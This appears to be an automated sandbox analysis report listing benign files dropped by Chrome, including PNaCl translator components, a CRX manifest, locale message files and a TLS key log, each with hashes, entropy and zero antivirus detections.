                                                                                                                                                                                SHA1:4DB7BDC80206765461AC68CEC03CE28689BBEE0C
                                                                                                                                                                                SHA-256:74E8885B87ED185E6811C23942FD9BD1FBAC9115768849AF95A9DECF6644B2EA
                                                                                                                                                                                SHA-512:FE3F86E926759E71494F2060C4ED3C883EBCAF20CB129A5AD7F142766C33FAB10B5FABC3C7C938E0E895E27EA0AC03CBFE8D0EEABF5300A4AD07F67FD96CC253
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: .ELF..............>.................................@.....@.........................NaCl....x86-64.......clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pnacl-llvm.git 7251d5b59fca15195c94a3a7da70f0081724448f)...text..comment..bss..group..note.GNU-stack..eh_frame..shstrtab..strtab..symtab..data..note.NaCl.ABI.x86-64.......................................................!................................................................................................................................................................................................../../../pnacl/support/crtend.c.__EH_FRAME_END__...............................................................................................@...............................................................H.......................................P.......................H...............................
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\5800_1946143775\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=7511538a3a6a0b862c772eace49075ed1bbe2377, stripped
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2163864
                                                                                                                                                                                Entropy (8bit):6.07050487397106
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24576:HPHonIwYZJ0ykwVO7Owf31yJKzCtxO8RSV4lY+PbeHVxCtjFV4lBNeSAmfGqa+A7:HvSMRwf3SKmlY+PyPvnM2Gq+
                                                                                                                                                                                MD5:0BB967D2E99BE65C05A646BC67734833
                                                                                                                                                                                SHA1:220A41A326F85081A74C4BB7C5F4E115D1B4B960
                                                                                                                                                                                SHA-256:C6C2D0C2FC3E38A9BFA19C78066439C2F745393F1FD1C49C3C6777F697222C76
                                                                                                                                                                                SHA-512:8EF8689E00E4B210A30444D18ED6247F364995ABEB2FD272064C3AF671EEDB4D9B8B67CA56F72FEBF8F56896D4EA7EC4B10CB445FFA1C710C1F312E9DA0E4896
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: .ELF..............>..... .......@.........!.........@.8...@......................................................................................................................................................{......W...............................................@.......@...............P.td.....h.......h.......h......4b......4b..............Q.td................................................................NaCl....x86-64..............GNU.u.S.:j..,w...u...#w.......?......Y@.......@......1@......B@......P@.....@X@.....``@......h@.....pp@.....H.@.......@.......@.......@.......@.......@....`..@.......@.......A.......A......................p................@..............?.......A.........5.....?5.5...?.5.....?......P9..............PC.......?......0@................aCoc...?..`.(..?.y.P.D.?<.s..O.u......$@.......@...............@........................................ ... ....... .......@...`...`...`...`...................`...`...`...`...`...`...`...................................`...
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\5800_1946143775\_platform_specific\x86_64\pnacl_public_x86_64_libcrt_platform_a
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:current ar archive
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):40552
                                                                                                                                                                                Entropy (8bit):4.127255967843258
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:xlP+1fzyUNVU5LmKxeOnjpD5eA/eUnUUxvT:xlP+1ryYMTekpD5eAWjuvT
                                                                                                                                                                                MD5:0CE951B216FCF76F754C9A845700F042
                                                                                                                                                                                SHA1:6F99A259C0C8DAD5AD29EE983D35B6A0835D8555
                                                                                                                                                                                SHA-256:7A1852EA4BB14A2A623521FA53F41F02F8BA3052046CF1AA0903CFAD0D1E1A7B
                                                                                                                                                                                SHA-512:7C2F9BF90EB1F43C17B4E14A077759FA9DC62A7239890975B2D6FD543B31289DC3B49AE456CA73B98DE9AC372034F340C708D23D9D3AAB05CCBDABDC56A6314E
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: !<arch>./ 0 0 0 0 624 `...................,...8...Z(..e...e...t...t...y`..y`..y`..y`..y`..y`..y`..y`..y`..y`..y`..y`..y`..y`........................fmod.fmodf.memcmp.memcpy.memmove.memset.__nacl_read_tp.__pnacl_init_irt.longjmp.setjmp.__Sz_fptosi_f32_i64.__Sz_fptosi_f64_i64.__Sz_fptoui_f32_i32.__Sz_fptoui_f32_i64.__Sz_fptoui_f64_i32.__Sz_fptoui_f64_i64.__Sz_sitofp_i64_f32.__Sz_sitofp_i64_f64.__Sz_uitofp_i32_f32.__Sz_uitofp_i32_f64.__Sz_uitofp_i64_f32.__Sz_uitofp_i64_f64.nacl_tp_tdb_offset.nacl_tp_tls_offset.__Sz_bitcast_16xi1_i16.__Sz_bitcast_8xi1_i8.__Sz_bitcast_i16_16xi1.__Sz_bitcast_i8_8xi1.__Sz_fptoui_4xi32_f32.__Sz_uitofp_4xi32_4xf32..e_fmod.o/ 0 0 0 644 2792 `..ELF..............>.....................(...........@.....@.......................................PH..AVAUATSfI.~.M..I.. E....@.A......D..D1.......8fI.~.M.....I.. E..A......D..D..t.D....D..f....D..=....r...Y...^.[A\A]A^..@..,$J.l=....J.$<A[A...M..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\5800_1946143775\_platform_specific\x86_64\pnacl_public_x86_64_libgcc_a
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:current ar archive
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):132784
                                                                                                                                                                                Entropy (8bit):3.6998481247844937
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:Hf0mOXYmeKzQUIdedRFvT5p1Ee2HyAlL3O4:Hf7OXdmWRJT5p1R2HyAhO4
                                                                                                                                                                                MD5:C37CA2EB468E6F05A4E37DF6E6020D0F
                                                                                                                                                                                SHA1:EA787E5EADFB488632EC60D8B80B555796FA9FE9
                                                                                                                                                                                SHA-256:C1483ED423FEE15D86E8B5D698B2CDAB89186CE7FF9C4E3D5F3F961FD80D7C6E
                                                                                                                                                                                SHA-512:01281DE92B281FB29E1ACA96AA64B740B65CC3A9097307827F0D8DB9E1C164C56AFCDFA0BF138EA670A596D55CE2C8D722760744E9FC9343BB6514417BF333BA
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: !<arch>./ 0 0 0 0 942 `....;...|.......4...x..#...-...4l..E...M...U...]...n...u...~X...4.......................L......................t...p...............`......"...*...1...:...D...K...T...\...d...r|..|0.......x...........L.......\...8..........................__clzti2.__compilerrt_fmax.__compilerrt_fmaxf.__compilerrt_logb.__compilerrt_logbf.__ctzti2.__divdc3.__divdi3.__divmoddi4.__divmodsi4.__divsc3.__divsi3.__divti3.__fixdfdi.__fixdfsi.__fixdfti.__fixsfdi.__fixsfsi.__fixsfti.__fixunsdfdi.__fixunsdfsi.__fixunsdfti.__fixunssfdi.__fixunssfsi.__fixunssfti.__floatdidf.__floatdisf.__floatsidf.__floatsisf.__floattidf.__floattisf.__floatundidf.__floatundisf.__floatunsidf.__floatunsisf.__floatuntidf.__floatuntisf.compilerrt_abort_impl.__moddi3.__modsi3.__modti3.__muldc3.__muloti4.__mulsc3.__multi3.__popcountdi2.__popcountsi2.__popcountti2.__powidf2.__powisf2.__udivdi3.__udivmoddi4.__udivmodsi4.__udivmodti4.__udivsi3.__udivti3.__umoddi3.__umodsi3.
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\5800_1946143775\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_a
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:current ar archive
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):13514
                                                                                                                                                                                Entropy (8bit):3.8217211433441904
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:uU9v4pXizdrEuxwk3vp20tprpdSGFwDqO:P9v4palvvc0tpFdSGFwmO
                                                                                                                                                                                MD5:4E8BEDA73EB7BD99528BF62B7835A3FA
                                                                                                                                                                                SHA1:DC0F263A7B2A649D11FF7B56FE9CFAC44F946036
                                                                                                                                                                                SHA-256:6B835FD48DF505EB336FF6518CE7B93BB0ED854DADAA5C1EEED48D420291F62C
                                                                                                                                                                                SHA-512:46116B8BABC719676D68FD40D2AC82F38A3D13D8A482ADFC6FC32A99170AC3420E52CC33242CCD0FA723ABF4FA5EDBB9CE16A09C729BF04AE4AFBB2F67A1E38B
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: !<arch>./ 0 0 0 0 94 `................._pnacl_wrapper_start.__pnacl_real_irt_query_func.__pnacl_wrap_irt_query_func..shim_entry.o/ 0 0 0 644 7392 `..ELF..............>..................... ...........@.....@.........................NaCl....x86-64..................................A.L....A.L...D...........D....A.....t+.. u..t"..A.D..........A... .....A.D...........f..D..<.......................Q.......................V.......................clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pnacl-llvm.git 7251d5b59fca15195c94a3a7da70f0081724448f).../../ppapi/native_client/src/untrusted/pnacl_irt_shim/shim_entry.c./mnt/data/b/build/slave/sdk/build/src/out_pnacl/x64.NACL_STARTUP_FINI.NACL_STARTUP_ENVC.NACL_STARTUP_ARGC.NACL_STARTUP_ARGV.NaClStartupInfoIndex.unsigned int.size_t.char.TYPE_na
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\5800_1946143775\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_dummy_a
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:current ar archive
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2078
                                                                                                                                                                                Entropy (8bit):3.21751839673526
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:MOcpdhWE5O/bZbmT3296bmT3TwQwDnvD/+R3:MHuECdaTS6aTTwXDvD/+l
                                                                                                                                                                                MD5:F950F89D06C45E63CE9862BE59E937C9
                                                                                                                                                                                SHA1:9CFAD34139CC428CE0C07A869C15B71A9632365D
                                                                                                                                                                                SHA-256:945B1C8A1666CBF05E8B8941B70D9D044BAAFB59B006F728F8995072DE7C4C40
                                                                                                                                                                                SHA-512:F9AFBB800A875EDCC63DEA4986179E73632B3182951A99C8B3D37DB454EFD7CC7192ECA5AC87514918A858BAD6DAEAB59548CA2E90EADA9900EF5B9F08E62CFC
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: !<arch>./ 0 0 0 0 30 `........._pnacl_wrapper_start..// 20 `.dummy_shim_entry.o/./0 0 0 0 644 1840 `..ELF..............>.................................@.....@.......................................PH..,$J.l=....J.$<.....f..D......................................NaCl....x86-64...clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pnacl-llvm.git 7251d5b59fca15195c94a3a7da70f0081724448f)............zR..x...................... ....C....C..... .........................rela.text..comment..bss..group..note.GNU-stack..rela.eh_frame..shstrtab..strtab..symtab..data..note.NaCl.ABI.x86-64.....................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\5800_1946143775\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_llc_nexe
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=309d6d3d463e6b1b0690f39eb226b1e4c469b2ce, stripped
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):14091416
                                                                                                                                                                                Entropy (8bit):5.928868737447095
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:196608:tKVqXp3Qev4dg6ilfHM8KLM2J3jqjnkZ:uqufB
                                                                                                                                                                                MD5:9B159191C29E766EBBF799FA951C581B
                                                                                                                                                                                SHA1:D1D4BBC63AB5FC1E4A54EB7B82095A6F2CE535EE
                                                                                                                                                                                SHA-256:2F4A3A0730142C5EE4FA2C05D27A5DEFC18886A382D45F5DB254B61B28ED642B
                                                                                                                                                                                SHA-512:0B4FF60B5428F81B8B1BCF3328CF80CBD88D8CE5E8BDBC236B06D5A54E7CF26168A3ABB348D87423DA613AB3F0B4D9B37CB5180804839F1CA158EC2B315DDF00
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: .ELF..............>..... .......@...................@.8...@...............$.....................................................................................................................!.......!......'......G...............................................@.......@...............P.td............................D.......D...............Q.td................................................................NaCl....x86-64..............GNU.0.m=F>k....&...i........................0C......0C..0C..0E..............0C......0E.-DT.!.?.-DT.!.........................?........-DT.!...-DT.!.?.......?......................?..............?."..."..."..."......@.......`...................... ...@...`...................... ...@...`...................... ...@...`...................... ...@...`.......................................`... ...@...`...........`...`.......@...@....... ....1..`3.. 4..`-..`-...:...:...F..@H..`H...H...F...F...G...H.. H...F..@G...I.. I..@I..@G...G...I...I...J...G..`I..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\5800_1946143775\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_sz_nexe
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=4b15de4ab227d5e46213978b8518d53c53ce1db9, stripped
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1901720
                                                                                                                                                                                Entropy (8bit):5.955741933854651
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12288:gXqUSpBjwQO2o8k+7zjidg4euCAauOILffvCpGy4Wh3BTFmHpq82K2/KsvPyla9d:gafZwcOdNe2auOepCBTFmJq3Kf8ksr
                                                                                                                                                                                MD5:9DC3172630E525854B232FF71499D77C
                                                                                                                                                                                SHA1:0082C58EDCE3769E90DB48E7C26090CE706AD434
                                                                                                                                                                                SHA-256:6AA1DA6C264E0AF4E32A004F4076C7557C6AC6D9C38B0C5DE97302D83FA248C3
                                                                                                                                                                                SHA-512:9E9584241A39EED1463D7D4C1B26AE570B839AA315778FF3400C61341EBA43B630307DE9F1532A265CA82EA69BDEA03EC9D963E59A18569C02DA8285449870FE
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: .ELF..............>..... .......@...................@.8...@.............................................................................................0.......0................................................Y......................................................@.......@...............P.td....t^......t^......t^.......W.......W..............Q.td................................................................NaCl....x86-64..............GNU.K..J.'..b......<S...`...`... ...@...@.......@.............................................Y@......................p................@.......?..............?.......A.........5.....?5.5...?.5.....?......P9..............PC.......?......0@................aCoc...?..`.(..?.y.P.D.?<.s..O.u......$@.......@...............@`...`.......@.................................................. ...`... ... .......`................... ... ...@...`.......................@... Z...[...[...e.......... ...@... ...@...`........0...0...2..`4.. 6...7...9...~...~...z...{...{..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\5800_1946143775\manifest.fingerprint
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):66
                                                                                                                                                                                Entropy (8bit):3.928261499316817
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:STDLGswXEVBcVdBiTDt3zLsW:SPLGLErcVdBiDtf3
                                                                                                                                                                                MD5:C00BCE97F21B1AD61EB9B8CD001795EE
                                                                                                                                                                                SHA1:8E0392FF3DB267D847711C3F4E0D7468060E1535
                                                                                                                                                                                SHA-256:59F06F04230E32E8BC839F45B984D31D611930427B631C963D09E7064A602363
                                                                                                                                                                                SHA-512:9930E44A6ECC62505DBADCEED5E05645909FF09816FB12AAC0414E6D2830AC09758366C3B7D4EDD7839C87EB16DFA4C66D8981AE6237D408B37135C3506F4CD2
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 1.6f6bc93dcd62dc251850d2ff458fda96083ceb7fbe8eeb11248b8485ef2aea23
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\5800_1946143775\manifest.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):573
                                                                                                                                                                                Entropy (8bit):4.859567579783832
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:BLqG6yDJmL4mLDlG9hQ181G46XzrXc+EFfNqpaiOc+T5NqXIOclNqXL:BkylmL4mLDlJ18116XsRNqtZeNqXIZlE
                                                                                                                                                                                MD5:1863B86D0863199AFDA179482032945F
                                                                                                                                                                                SHA1:36F56692E12F2A1EFCA7736C236A8D776B627A86
                                                                                                                                                                                SHA-256:F14E451CE2314D29087B8AD0309A1C8B8E81D847175EF46271E0EB49B4F84DC5
                                                                                                                                                                                SHA-512:836556F3D978A89D3FC1F07FCED2732A17E314ED6A021737F087E32A69BFA46FD706EBBDFD3607FF42EDCB75DC463C29B9D9D2F122504F567BB95844F579831B
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {."update_url": "https://clients2.google.com/service/update2/crx",.. "description": "Portable Native Client Translator Multi-CRX",. "name": "PNaCl Translator Multi-CRX",. "manifest_version": 2,. "minimum_chrome_version": "30.0.0.0",. "version": "0.57.44.2492",. "platforms": [. {. "nacl_arch": "x86-32",. "sub_package_path": "_platform_specific/x86_32/". },. {. "nacl_arch": "x86-64",. "sub_package_path": "_platform_specific/x86_64/". },. {. "nacl_arch": "arm",. "sub_package_path": "_platform_specific/arm/". }. ].}.
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\browser-sslkeys.log
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):17894
                                                                                                                                                                                Entropy (8bit):4.646642852147696
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:cwxMsL3E0IjA30Ekkg8VHmZrfmaTZhkDW5:cwxr3fK8KTZh1
                                                                                                                                                                                MD5:8FE92B38F83092F06A296889CDDB14BF
                                                                                                                                                                                SHA1:396567FA611A0CB3238132ED9A3B7A9B01BD2817
                                                                                                                                                                                SHA-256:C81705219AA9BDA164C60AF61326ABEE443934E6E4C1B46BC40D2F7AB3E4E513
                                                                                                                                                                                SHA-512:A3A86988F35BAF8F8B424ED405C4964CBE93CEB4F991B7AE19341DFC7FADEE92FA1F1BA0AC655E886BDAEDF778A25D78AAAE9818FDDAA0B4A2CA5643B3C370A8
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: CLIENT_HANDSHAKE_TRAFFIC_SECRET eb8b824006d4b624636d477ad49f3f0a0817fbf69837c11e1e166bc604038b21 111271a56e6229e1b550b899b895704e0bc9adefef4f59face7088ae163d6ef0.SERVER_HANDSHAKE_TRAFFIC_SECRET eb8b824006d4b624636d477ad49f3f0a0817fbf69837c11e1e166bc604038b21 bb0bed8563baa810519e0104ae0a48b301b7d11c2e711acf52aed12b5a905cc9.CLIENT_HANDSHAKE_TRAFFIC_SECRET 88498d5592640a7fd36c1c5e08ad7ce3ef265bf71b7540fa04217d2d6a85cb74 da9b84886f60998ebe0b4e0d29241c5b9650fb04a20a50ff654ec45eb9eaa9d4.SERVER_HANDSHAKE_TRAFFIC_SECRET 88498d5592640a7fd36c1c5e08ad7ce3ef265bf71b7540fa04217d2d6a85cb74 638059c39986f92c57090728b5bab90a5ee75ee4abdcdcb485b513b92382c029.CLIENT_HANDSHAKE_TRAFFIC_SECRET d926b82365e54eefab8d1350f130961eca7001649ac10ca4307955d844957f4b 57ab43c99d5e8f1f0f8fe0f3d84cacb226f97aca393e42f9c22c3335d417d678.SERVER_HANDSHAKE_TRAFFIC_SECRET d926b82365e54eefab8d1350f130961eca7001649ac10ca4307955d844957f4b 0ce4cc3f76900e2b5dbf5c82143d97e5252d20ca27bc4f9d7925d28064cfb633.CLIENT_HANDSHAKE_TRAFFIC_SEC
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\bg\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):796
                                                                                                                                                                                Entropy (8bit):4.864931792423268
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJMLkSlwZGGMLkSlwZ+WYpU34f145Gb+dgoxTyO8ZpU34f1L0frhmJ03OyZnLt:1HE7n4gn8WYpYrbhz8ZpotHOGAOf6aD
                                                                                                                                                                                MD5:6F8E288A9AD5B1ED8633B430E2B4D4CA
                                                                                                                                                                                SHA1:F671D3D4BEFA431D1946D706F4192D44E29B6F08
                                                                                                                                                                                SHA-256:A114E2783D0E9B12155017323BA70838F0F82A71C7EE8DC1F115AE36991241F8
                                                                                                                                                                                SHA-512:0F87F3F0D115B872288949E59ACD3CD41B1FBC64A622D8FDA6D71FAFC5A900D92ADFBB0E7EB926F2A8759BBAA0896D48728FB719BBF5EF54AC21027328F7700C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "........ . ... ........ .. Chrome".. },.. "app_name": {.. "message": "........ . ... ........ .. Chrome".. },.. "craw_app_unavailable": {.. "message": "........... .... ...... .. .............".. },.. "craw_connect_to_network": {.. "message": "...., ........ .. . ......".. },.. "iap_unavailable": {.. "message": "........... .... ...... .. .......... ....... .. .........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "...., ...... . Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\ca\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):675
                                                                                                                                                                                Entropy (8bit):4.536753193530313
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJ0gbbGG0gbb+WYpU34g3YbiLO+dgyGFoO8ZpU34+puiPmb03OyZnLAOfTYABk:1HE5baib6WYpm31Lt0Z8Zp8pxOGAOfKD
                                                                                                                                                                                MD5:1FDAFC926391BD580B655FBAF46ED260
                                                                                                                                                                                SHA1:C95743C3F43B2B099FEBEBC5BD850F0C20E820AC
                                                                                                                                                                                SHA-256:C67898B67F9C9209EAFDA6532B62D5789863CFB855998DD6A70E7775316CEC20
                                                                                                                                                                                SHA-512:39D95D45C5746DA3BAA7AE6A3344EA17D7A7C3569C2A56959FF119261DA08C747A320FCF701AC72B8DBDBF8BF06FD8B239017A282CDDA444F3826D4EC672CBB4
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Sistema de pagaments de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagaments de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Ara mateix aquesta aplicaci. no est. disponible.".. },.. "craw_connect_to_network": {.. "message": "Connecteu-vos a una xarxa.".. },.. "iap_unavailable": {.. "message": "La funci. Pagaments a l'aplicaci. no est. disponible actualment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicieu la sessi. a Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\cs\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):641
                                                                                                                                                                                Entropy (8bit):4.698608127109193
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJfZGGfZ+WYpU34OBh+dgN/O8ZpU34j05U03OyZnLAOfTYWc:1HEl4G8WYpdt8Zpq5TOGAOfW
                                                                                                                                                                                MD5:76DEC64ED1556180B452A13C83171883
                                                                                                                                                                                SHA1:CFB1E56FD587BCDC459C1D9A683B71F9849058F9
                                                                                                                                                                                SHA-256:32290D69A90E6BAAC428B10382C99221B12773BB9A184F3B93DFB48A4F6D7A40
                                                                                                                                                                                SHA-512:5230A217968D5DC463E2E92D704544311A721E5CEF65C3125CBD8DEB9C0293D3BFB5C820A6011ABF77095FDEE7DAF67D541DC202B0C9CDB0908CBB85D84885CB
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "app_name": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikace v sou.asn. dob. nen. dostupn..".. },.. "craw_connect_to_network": {.. "message": "P.ipojte se pros.m k s.ti.".. },.. "iap_unavailable": {.. "message": "Platby v aplikaci aktu.ln. nejsou k dispozici.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "P.ihlaste se do Chromu.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\da\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):624
                                                                                                                                                                                Entropy (8bit):4.5289746475384565
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJJMKKFZGGJMKKFZ+WYpU34OHu+dgxlCZO8ZpU34J4Wu03OyZnLAOfTYzD:1HErMKfqMKVWYpM6lL8ZpDNOGAOfiD
                                                                                                                                                                                MD5:238B97A36E411E42FF37CEFAF2927ED1
                                                                                                                                                                                SHA1:4E47AC90BA24C8F4724D9293FA40CFD4ADA66FE0
                                                                                                                                                                                SHA-256:4977D4A053542FF66967FAED6B06585DD70E68E20BFEB533B66FE3287F9655D9
                                                                                                                                                                                SHA-512:FD0742D47B5F5AB9AAD9B4C3D57F63CB693E060EECE123A72036C6E92156D099495C7E9E9CC6DC83EEBCDDCC4B4C81FB47E4C9559DA3EBA024780FFF10C53E0A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Betalinger i Chrome Webshop".. },.. "app_name": {.. "message": "Betalinger i Chrome Webshop".. },.. "craw_app_unavailable": {.. "message": "Appen er ikke tilg.ngelig i .jeblikket.".. },.. "craw_connect_to_network": {.. "message": "Opret forbindelse til et netv.rk.".. },.. "iap_unavailable": {.. "message": "Betaling i appen er ikke tilg.ngelig i .jeblikket.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Log ind p. Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\de\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):651
                                                                                                                                                                                Entropy (8bit):4.583694000020627
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJQ1ZGGQ1Z+WYpU34pCEMT+dgJMlCTO8ZpU34p6FK603OyZnLAOfTYJ6K:1HEzWWYp3Bewv8Zp7k4OGAOfQj
                                                                                                                                                                                MD5:6B3E916E8C1991AA0453CBA00FEDCAAA
                                                                                                                                                                                SHA1:D6366D15912E40CA107FD42BFE9579C3336A51F9
                                                                                                                                                                                SHA-256:A62FFAB910E31531758EEE48B2CC71A8857BEC3021DEAD50B668CBA3C8667053
